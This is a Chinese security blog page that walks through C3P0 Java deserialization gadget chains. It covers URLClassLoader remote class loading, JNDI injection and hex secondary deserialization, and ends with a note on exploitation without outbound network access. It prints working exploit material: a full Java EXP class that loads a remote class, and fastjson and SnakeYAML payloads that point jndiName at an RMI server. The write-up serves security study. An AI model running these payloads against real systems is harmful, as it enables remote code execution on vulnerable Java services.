
  <!DOCTYPE html>
  <html lang="zh-CN"  data-theme="dark" >
  <head>
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="utf-8">
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
  <script src="https://www.googletagmanager.com/gtag/js?id=true"></script>
  <script data-pjax>
    window.dataLayer = window.dataLayer || [];

    function gtag() {
      dataLayer.push(arguments);
    }

    gtag('js', new Date());

    gtag('config', 'true');
  </script>
  <!-- End Google Analytics -->


  

  
  <script async src="https://hm.baidu.com/hm.js?true"></script>
  <script data-pjax>
    var _hmt = _hmt || [];
    _hmt.push(["_trackPageview", location.pathname]);
  </script>


  
  <script>window.icon_font = '4552607_tq6stt6tcg';window.clipboard_tips = {"success":"复制成功(*^▽^*)","fail":"复制失败 (ﾟ⊿ﾟ)ﾂ","copyright":{"enable":false,"count":50,"content":"本文版权：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！"}};window.outdate = {"enable":true,"daysAgo":180,"message":"本文最后更新于 {time}，请注意文中内容可能已经发生变化。"};</script>
  
  
  <title>
    C3P0链 |
    
    yyjccc的博客
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CUbuntu%20Mono:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CUbuntu%20Mono:400,400italic,700,700italic&display=swap" media="print" onload="this.media&#x3D;&#39;all&#39;">
  
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_tq6stt6tcg.woff2" as="font" type="font/woff2" crossorigin="anonymous">
  
  
    
<link rel="stylesheet" href="/css/loader.css">

  
  <meta name="description" content="参考：Java安全学习——C3P0链 - 枫のBlog  C3P0介绍C3P0是一个开源的JDBC连接池，它实现了数据源和JNDI绑定，支持JDBC3规范和JDBC2的标准扩展。目前使用它的开源项目有Hibernate，Spring等。  JDBC是Java DataBase Connectivity的缩写，它是Java程序访问数据库的标准接口。使用Java程序访问数据库时，Java代码并不是直接">
<meta property="og:type" content="article">
<meta property="og:title" content="C3P0链">
<meta property="og:url" content="https://yyjccc.github.io/2024/02/24/C3P0%E9%93%BE/index.html">
<meta property="og:site_name" content="yyjccc的博客">
<meta property="og:description" content="参考：Java安全学习——C3P0链 - 枫のBlog  C3P0介绍C3P0是一个开源的JDBC连接池，它实现了数据源和JNDI绑定，支持JDBC3规范和JDBC2的标准扩展。目前使用它的开源项目有Hibernate，Spring等。  JDBC是Java DataBase Connectivity的缩写，它是Java程序访问数据库的标准接口。使用Java程序访问数据库时，Java代码并不是直接">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/1.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/2.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/3.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/4.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/5.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/6.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/7.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/8.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/9.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/10.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/11.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/12.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/13.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/14.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/15.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/16.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/17.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/18.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/19.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/20.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/21.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/22.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/23.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/24.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/25.png">
<meta property="og:image" content="https://yyjccc.github.io/img/2-24/26.png">
<meta property="article:published_time" content="2024-02-24T14:52:56.486Z">
<meta property="article:modified_time" content="2024-04-23T16:32:50.446Z">
<meta property="article:author" content="Yyjccc">
<meta property="article:tag" content="web安全">
<meta property="article:tag" content="java安全">
<meta property="article:tag" content="反序列化">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://yyjccc.github.io/img/2-24/1.png">
  
    <link rel="alternate" href="/atom.xml" title="yyjccc的博客" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/images/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
  
  
  
    
      
<link rel="stylesheet" href="https://npm.webcache.cn/gitalk/dist/gitalk.css">

    
  
  
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js"></script>

  
    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.0.1/dist/aos.css">

  
<meta name="generator" content="Hexo 6.3.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style><!-- hexo-inject:begin --><!-- hexo-inject:end -->
</head>

  <body>
    
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi">
        <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
          <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="#ff5252" />
          <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
         M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="#ff5252" />
        </svg>
      </div>
      <div class="loading-word">少女祈祷中...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var startLoading = () => {
      time = Date.now();
      document.getElementById('loader').classList.remove("loading");
    }
    var endLoading = () => {
      if (!time) {
        document.body.style.overflow = 'auto';
        document.getElementById('loader').classList.add("loading");
      } else {
        if (Date.now() - time > 500) {
          time = null;
          document.body.style.overflow = 'auto';
          document.getElementById('loader').classList.add("loading");
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    document.getElementById('loader').addEventListener('click', endLoading);
  </script>

<div id="copy-tooltip" style="pointer-events: none; opacity: 0; transition: all 0.2s ease; position: fixed;top: 50%;left: 50%;z-index: 999;transform: translate(-50%, -50%);color: white;background: rgba(0, 0, 0, 0.5);padding: 10px 15px;border-radius: 10px;">
</div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav">
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/">首页</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/archives">归档</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/about">关于</a>
      </span>
    
      <span class="main-nav-link-wrap">
        <div class="main-nav-icon icon-taichi"></div>
        <a class="main-nav-link" href="/friend">友链</a>
      </span>
    
    <a id="main-nav-toggle" class="nav-icon"></a>
  </nav>
  <nav id="sub-nav">
    
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS 订阅"></a>
    
    
    
      <a id="nav-search-btn" class="nav-icon popup-trigger" title="搜索"></a>
    
  </nav>
</div>
<header id="header">
  
    
      <img fetchpriority="high" src="/images/banner.webp" alt="C3P0链">
    
  
  <div id="header-outer">
    <div id="header-title">
      
        
        
          <a href="/" id="logo">
            <h1 data-aos="slide-up">C3P0链</h1>
          </a>
        
      
      
        
        <h2 id="subtitle-wrap" data-aos="slide-down">
          
        </h2>
      
    </div>
  </div>
</header>

        <div id="content">
          
          <section id="main"><article id="post-C3P0链" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <a href="/2024/02/24/C3P0%E9%93%BE/" class="article-date-link" data-aos="zoom-in">
    <time datetime="2024-02-24T14:52:56.486Z" itemprop="datePublished">2024-02-24</time>
    <time style="display: none;" id="post-update-time">2024-04-24</time>
  </a>
</div>

      
  <div class="article-category">
    <a class="article-category-link" href="/categories/java%E5%AE%89%E5%85%A8/" data-aos="zoom-in">java安全</a>
  </div>


    </div>
    <div class="hr-line"></div>
    

    <div class="e-content article-entry" itemprop="articleBody">
      
        <blockquote id="outdate-blockquote" style="display: none;"><p></p></blockquote>
      
      
        <p>参考：<a target="_blank" rel="noopener" href="https://goodapple.top/archives/1749">Java安全学习——C3P0链 - 枫のBlog</a></p>
<p><a name="BScjw"></a></p>
<h1 id="C3P0介绍"><a href="#C3P0介绍" class="headerlink" title="C3P0介绍"></a>C3P0介绍</h1><figure class="highlight text"><table><tbody><tr><td class="code"><pre><span class="line">C3P0是一个开源的JDBC连接池，它实现了数据源和JNDI绑定，支持JDBC3规范和JDBC2的标准扩展。目前使用它的开源项目有Hibernate，Spring等。</span><br></pre></td></tr></tbody></table></figure>

<p>JDBC是Java DataBase Connectivity的缩写，它是Java程序访问数据库的标准接口。<br>使用Java程序访问数据库时，Java代码并不是直接通过TCP连接去访问数据库，而是通过JDBC接口来访问，而JDBC接口则通过JDBC驱动来实现真正对数据库的访问。<br>连接池类似于线程池，在一些情况下我们会频繁地操作数据库，此时Java在连接数据库时会频繁地创建或销毁句柄，增大资源的消耗。为了避免这样一种情况，我们可以提前创建好一些连接句柄，需要使用时直接使用句柄，不需要时可将其放回连接池中，准备下一次的使用。类似这样一种能够复用句柄的技术就是池技术。</p>
<br>
<a name="vDNj8"></a>
# Gadget
&gt; 导入依赖

<figure class="highlight xml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>com.mchange<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>c3p0<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">version</span>&gt;</span>0.9.5.2<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br></pre></td></tr></tbody></table></figure>


<p>C3P0常见的利用方式有如下三种</p>
<ul>
<li>URLClassLoader远程类加载</li>
<li>JNDI注入</li>
<li>利用HEX序列化字节加载器进行反序列化攻击</li>
</ul>
<p><a name="wEy7I"></a></p>
<h2 id="URLClassLoader远程类加载"><a href="#URLClassLoader远程类加载" class="headerlink" title="URLClassLoader远程类加载"></a>URLClassLoader远程类加载</h2><p><a name="Gy11c"></a></p>
<h5 id="过程"><a href="#过程" class="headerlink" title="过程"></a>过程</h5><p>流程：PoolBackedDataSourceBase#readObject -&gt;ReferenceSerialized#getObject -&gt;ReferenceableUtils#referenceToObject -&gt;ObjectFactory#getObjectInstance</p>
<p>入口类：PoolBackedDataSourceBase<br>PoolBackedDataSourceBase#readObject<br>!<img src="/img/2-24/1.png"></p>
<p>如果反序列化得到的类是IndirectlySerialized的实例，则会调用其getObject()方法，然后将返回的类转为ConnectionPoolDataSource类</p>
<p>IndirectlySerialized是一个接口，查找实现类，找到ReferenceSerialized类<br>!<img src="/img/2-24/2.png"><br>在这里发现存在lookup方法，那么肯能这点就存在jndi注入，好吧但实际上在反序列化时我们是无法调用到该方法的，因为属性contextName为默认null且不可控<br>继续进入ReferenceableUtils#referenceToObject<br>这里reference我们放在后面EXP部分，怎么控制<br>!<img src="/img/2-24/3.png"><br>从第一个参数Reference ref获取URL,并使用URLClassLoader获取class类<br>forName进行类加载<br>newInstance实例。恶意类静态代码块和构造函数会被执行</p>
<p><a name="MLhzx"></a></p>
<h5 id="EXP编写"><a href="#EXP编写" class="headerlink" title="EXP编写"></a>EXP编写</h5><p>由于入口类writeObject的是connectionPoolDataSource属性，connectionPoolDataSource是一个接口没有继承Serializable接口（EXP就得实现这个接口才行），无法被直接序列化，因此走的是catch分支</p>
<p>!<img src="/img/2-24/4.png"><br>可以看到使用包装类包装了这个类。发现是一个接口的方法。<br>找到唯一的实现类ReferenceIndirector，<br>!<img src="/img/2-24/5.png"><br>调用Referenceable接口的getReference方法，那么我们的EXP就该实现这个接口，并返回我们恶意的Reference对象。</p>
<p>然后继续看ReferenceSerialized<br>!<img src="/img/2-24/6.png"><br>这里就赋值了上面Gadget最后要用的reference<br>!<img src="/img/2-24/7.png"><br>最后EXP</p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="keyword">package</span> C3P0;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.naming.NamingException;</span><br><span class="line"><span class="keyword">import</span> javax.naming.Reference;</span><br><span class="line"><span class="keyword">import</span> javax.naming.Referenceable;</span><br><span class="line"><span class="keyword">import</span> javax.sql.ConnectionPoolDataSource;</span><br><span class="line"><span class="keyword">import</span> javax.sql.PooledConnection;</span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.sql.SQLException;</span><br><span class="line"><span class="keyword">import</span> java.sql.SQLFeatureNotSupportedException;</span><br><span class="line"><span class="keyword">import</span> java.util.logging.Logger;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">C3P0_URLClassLoader</span> {</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">class</span> <span class="title class_">EXP_Loader</span> <span class="keyword">implements</span> <span class="title class_">ConnectionPoolDataSource</span>, Referenceable{</span><br><span class="line"></span><br><span class="line">        <span class="meta">@Override</span></span><br><span class="line">        <span class="keyword">public</span> Reference <span class="title function_">getReference</span><span class="params">()</span> <span class="keyword">throws</span> NamingException {</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">new</span> <span class="title class_">Reference</span>(<span class="string">"ExpClass"</span>,<span class="string">"exp"</span>,<span class="string">"http://127.0.0.1:8888/"</span>);</span><br><span class="line">        }</span><br><span class="line"></span><br><span class="line">        <span class="meta">@Override</span></span><br><span class="line">        <span class="keyword">public</span> PooledConnection <span class="title function_">getPooledConnection</span><span class="params">()</span> <span class="keyword">throws</span> SQLException {</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">        }</span><br><span class="line"></span><br><span class="line">        <span class="meta">@Override</span></span><br><span class="line">        <span class="keyword">public</span> PooledConnection <span class="title function_">getPooledConnection</span><span class="params">(String user, String password)</span> <span class="keyword">throws</span> SQLException {</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">        }</span><br><span class="line"></span><br><span class="line">        <span class="meta">@Override</span></span><br><span class="line">        <span class="keyword">public</span> PrintWriter <span class="title function_">getLogWriter</span><span class="params">()</span> <span class="keyword">throws</span> SQLException {</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">        }</span><br><span class="line"></span><br><span class="line">        <span class="meta">@Override</span></span><br><span class="line">        <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setLogWriter</span><span class="params">(PrintWriter out)</span> <span class="keyword">throws</span> SQLException {</span><br><span class="line"></span><br><span class="line">        }</span><br><span class="line"></span><br><span class="line">        <span class="meta">@Override</span></span><br><span class="line">        <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setLoginTimeout</span><span class="params">(<span class="type">int</span> seconds)</span> <span class="keyword">throws</span> SQLException {</span><br><span class="line"></span><br><span class="line">        }</span><br><span class="line"></span><br><span class="line">        <span class="meta">@Override</span></span><br><span class="line">        <span class="keyword">public</span> <span class="type">int</span> <span class="title function_">getLoginTimeout</span><span class="params">()</span> <span class="keyword">throws</span> SQLException {</span><br><span class="line">            <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">        }</span><br><span class="line"></span><br><span class="line">        <span class="meta">@Override</span></span><br><span class="line">        <span class="keyword">public</span> Logger <span class="title function_">getParentLogger</span><span class="params">()</span> <span class="keyword">throws</span> SQLFeatureNotSupportedException {</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="comment">//序列化</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">Pool_Serial</span><span class="params">(ConnectionPoolDataSource c)</span> <span class="keyword">throws</span> NoSuchFieldException, IllegalAccessException, IOException {</span><br><span class="line">        <span class="comment">//反射修改connectionPoolDataSource属性值为我们的恶意ConnectionPoolDataSource类</span></span><br><span class="line">        <span class="type">PoolBackedDataSourceBase</span> <span class="variable">poolBackedDataSourceBase</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">PoolBackedDataSourceBase</span>(<span class="literal">false</span>);</span><br><span class="line">        <span class="type">Class</span> <span class="variable">cls</span> <span class="operator">=</span> poolBackedDataSourceBase.getClass();</span><br><span class="line">        <span class="type">Field</span> <span class="variable">field</span> <span class="operator">=</span> cls.getDeclaredField(<span class="string">"connectionPoolDataSource"</span>);</span><br><span class="line">        field.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        field.set(poolBackedDataSourceBase,c);</span><br><span class="line"></span><br><span class="line">        <span class="comment">//序列化流写入文件</span></span><br><span class="line">        <span class="type">FileOutputStream</span> <span class="variable">fos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(<span class="keyword">new</span> <span class="title class_">File</span>(<span class="string">"exp.bin"</span>));</span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">oos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(fos);</span><br><span class="line">        oos.writeObject(poolBackedDataSourceBase);</span><br><span class="line"></span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="comment">//反序列化</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">Pool_Deserial</span><span class="params">()</span> <span class="keyword">throws</span> IOException, ClassNotFoundException {</span><br><span class="line">        <span class="type">FileInputStream</span> <span class="variable">fis</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">FileInputStream</span>(<span class="keyword">new</span> <span class="title class_">File</span>(<span class="string">"exp.bin"</span>));</span><br><span class="line">        <span class="type">ObjectInputStream</span> <span class="variable">objectInputStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(fis);</span><br><span class="line">        objectInputStream.readObject();</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {</span><br><span class="line">        <span class="type">EXP_Loader</span> <span class="variable">exp_loader</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">EXP_Loader</span>();</span><br><span class="line">        Pool_Serial(exp_loader);</span><br><span class="line">        Pool_Deserial();</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<p>URL所在目录下必须有包名的目录<br><a name="T9sRB"></a></p>
<h2 id="JNDI注入"><a href="#JNDI注入" class="headerlink" title="JNDI注入"></a>JNDI注入</h2><p>这条链子依赖于fastjson或者Jackson、snakeyaml等反序列化漏洞,利用的是getter和setter方法<br><a name="CQJNO"></a></p>
<h3 id="过程-1"><a href="#过程-1" class="headerlink" title="过程"></a>过程</h3><p>流程</p>
<figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line">#修改jndiName</span><br><span class="line">JndiRefConnectionPoolDataSource#setJndiName -&gt;</span><br><span class="line">JndiRefForwardingDataSource#setJndiName</span><br><span class="line"> </span><br><span class="line">#JNDI调用</span><br><span class="line">JndiRefConnectionPoolDataSource#setLoginTime -&gt;</span><br><span class="line">WrapperConnectionPoolDataSource#setLoginTime -&gt;</span><br><span class="line">JndiRefForwardingDataSource#setLoginTimeout -&gt;</span><br><span class="line">JndiRefForwardingDataSource#inner -&gt;</span><br><span class="line">JndiRefForwardingDataSource#dereference() -&gt;</span><br><span class="line">Context#lookup</span><br></pre></td></tr></tbody></table></figure>
<p>JndiRefConnectionPoolDataSource#setLoginTimeout<br>!<img src="/img/2-24/8.png"><br>wcps是WrapperConnectionPoolDataSource类<br>!<img src="/img/2-24/9.png"><br>继续进入<br>!<img src="/img/2-24/10.png"><br>调式发现getNestedDataSource()返回的是JndiRefForwardingDataSource对象<br>!<img src="/img/2-24/11.png"><br>找到setLoginTimeout方法<br>!<img src="/img/2-24/12.png"><br>进入inner方法</p>
<p>!<img src="/img/2-24/13.png"><br>继续进入dereference方法<br>!<img src="/img/2-24/14.png"><br>最后在这里创建initialContext，并使用危险方法lookup。（到这里就有jndi注入了）<br>只需能控制jndiName就能够进行jndi注入</p>
<p>继续查看是否可控jndiName</p>
<p>JndiRefConnectionPoolDataSource#setJndiName</p>
<p>!<img src="/img/2-24/15.png"><br>jrfds为JndiRefForwardingDataSource对象，刚好跟上文对应<br>这里调用的是父类的setJndiName<br>进入JndiRefDataSourceBase#setJndiName<br>!<img src="/img/2-24/16.png"><br>这里对上面的jndiName赋值</p>
<p><a name="IbZOd"></a></p>
<h3 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h3><p><a name="X3Ocj"></a></p>
<h5 id="普通exp"><a href="#普通exp" class="headerlink" title="普通exp"></a><strong>普通exp</strong></h5><figure class="highlight java"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">JndiRefConnectionPoolDataSource</span> <span class="variable">jndiRefConnectionPoolDataSource</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">JndiRefConnectionPoolDataSource</span>();</span><br><span class="line">		<span class="keyword">try</span> {</span><br><span class="line">			jndiRefConnectionPoolDataSource.setJndiName(<span class="string">"rmi://127.0.0.1:8085/RFKMphyY"</span>);</span><br><span class="line">			jndiRefConnectionPoolDataSource.setLoginTimeout(<span class="number">2</span>);</span><br><span class="line">		} <span class="keyword">catch</span> (SQLException e) {</span><br><span class="line">			<span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">RuntimeException</span>(e);</span><br><span class="line">		} <span class="keyword">catch</span> (PropertyVetoException e) {</span><br><span class="line">			<span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">RuntimeException</span>(e);</span><br><span class="line">		}</span><br></pre></td></tr></tbody></table></figure>
<p>思路：jndiRefConnectionPoolDataSource#setJndiName设置jndi的路径，<br>jndiRefConnectionPoolDataSource#setLoginTimeout触发jndi注入</p>
<p><a name="L2FPH"></a></p>
<h5 id="fastjson版"><a href="#fastjson版" class="headerlink" title="fastjson版"></a><strong>fastjson版</strong></h5><figure class="highlight json"><table><tbody><tr><td class="code"><pre><span class="line"><span class="punctuation">{</span><span class="attr">"@type"</span><span class="punctuation">:</span><span class="string">"com.mchange.v2.c3p0.JndiRefConnectionPoolDataSource"</span><span class="punctuation">,</span><span class="attr">"jndiName"</span><span class="punctuation">:</span><span class="string">"rmi://127.0.0.1:8085/RFKMphyY"</span><span class="punctuation">,</span><span class="attr">"loginTimeout"</span><span class="punctuation">:</span><span class="number">2</span><span class="punctuation">}</span></span><br></pre></td></tr></tbody></table></figure>

<p><a name="wmUlk"></a></p>
<h5 id="SnakeYaml版"><a href="#SnakeYaml版" class="headerlink" title="SnakeYaml版"></a><strong>SnakeYaml版</strong></h5><figure class="highlight yaml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="type">!!com.mchange.v2.c3p0.JndiRefConnectionPoolDataSource</span> {<span class="attr">jndiName:</span> <span class="string">"rmi://127.0.0.1:8085/RFKMphyY"</span>, <span class="attr">loginTimeout:</span> <span class="string">"2"</span>}</span><br></pre></td></tr></tbody></table></figure>
<p>注意空格(踩过坑)</p>
<p><a name="nEs1R"></a></p>
<h2 id="HEX二次反序列化"><a href="#HEX二次反序列化" class="headerlink" title="HEX二次反序列化"></a>HEX二次反序列化</h2><p><a name="X8Z6c"></a></p>
<h3 id="过程-2"><a href="#过程-2" class="headerlink" title="过程"></a>过程</h3><p>流程</p>
<figure class="highlight yaml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="comment">#设置userOverridesAsString属性值</span></span><br><span class="line"><span class="string">WrapperConnectionPoolDataSource#setuserOverridesAsString</span> <span class="string">-&gt;</span></span><br><span class="line"><span class="string">WrapperConnectionPoolDataSourceBase#setUserOverridesAsString</span></span><br><span class="line"> </span><br><span class="line"><span class="comment">#初始化类时反序列化十六进制字节流</span></span><br><span class="line"><span class="string">WrapperConnectionPoolDataSource#WrapperConnectionPoolDataSource</span> <span class="string">-&gt;</span></span><br><span class="line"><span class="string">C3P0ImplUtils#parseUserOverridesAsString</span> <span class="string">-&gt;</span></span><br><span class="line"><span class="string">SerializableUtils#fromByteArray</span> <span class="string">-&gt;</span></span><br><span class="line"><span class="string">SerializableUtils#deserializeFromByteArray</span> <span class="string">-&gt;</span></span><br><span class="line"><span class="string">ObjectInputStream#readObject</span></span><br></pre></td></tr></tbody></table></figure>

<p>WrapperConnectionPoolDataSource#setuserOverridesAsString<br>调用父类方法，WrapperConnectionPoolDataSourceBase#setUserOverridesAsString<br>!<img src="/img/2-24/17.png"><br>会获取原来的值和新的值放入另一个方法中<br>进入VetoableChangeSupport#fireVetoableChange<br>继续进入重载方法<br>!<img src="/img/2-24/18.png"><br>然后调用所有listener的vetoableChange方法<br>!<img src="/img/2-24/19.png"><br>当前有一个listener就是WrapperConnectionPoolDataSource<br>进入WrapperConnectionPoolDataSource#vetoableChange<br>!<img src="/img/2-24/20.png"><br>然后调到这里<br>!<img src="/img/2-24/21.png"><br>val就是我们设置的属性值<br>进入C3P0ImplUtils#parseUserOverridesAsString<br>!<img src="/img/2-24/22.png"><br>这里会从默认前缀HexAsciiSerializedMap加上一个字符后开始截取真正的反序列化数据（那么payload就应该加上这个前缀）<br>然后将字符串转为字符数组</p>
<p>进入SerializableUtils#fromByteArray<br>!<img src="/img/2-24/23.png"><br>进入deserializeFromByteArray<br>!<img src="/img/2-24/24.png"><br>这里就是一个链子结尾，触发了原生的反序列化，readObject，也算是反序列链子的一个入口点，因此可以用这个来进行二次反序列化</p>
<p><a name="cBnw1"></a></p>
<h1 id="C3P0不出网利用"><a href="#C3P0不出网利用" class="headerlink" title="C3P0不出网利用"></a>C3P0不出网利用</h1><p>不论是URLClassLoader加载远程类，还是JNDI注入，都需要目标机器能够出网。而加载Hex字符串的方式虽然不用出网，但却有Fastjson等的相关依赖。那么如果目标机器不出网，又没有Fastjson依赖的话，C3P0链又该如何利用呢<br>在JNDI高版本利用中，我们可以加载本地的Factory类进行攻击，而利用条件之一就是该工厂类至少存在一个getObjectInstance()方法。比如通过加载Tomcat8中的org.apache.naming.factory.BeanFactory进行EL表达式注入<br>!<img src="/img/2-24/25.png"><br>我们再回头看C3P0中利用URLClassLoader进行任意类加载的攻击方式<br>!<img src="/img/2-24/26.png"><br>在实例化完我们的恶意类之后，调用了恶意类ObjectFactory.getObjectInstance()。由于可以实例化任意类，所以我们可以将该类设置为本地的BeanFactory类。在不出网的条件下可以进行EL表达式注入，利用方式类似JNDI的高版本绕过。当然了，这种利用方式需要存在Tomcat8相关依赖环境<br><a name="HSnur"></a></p>
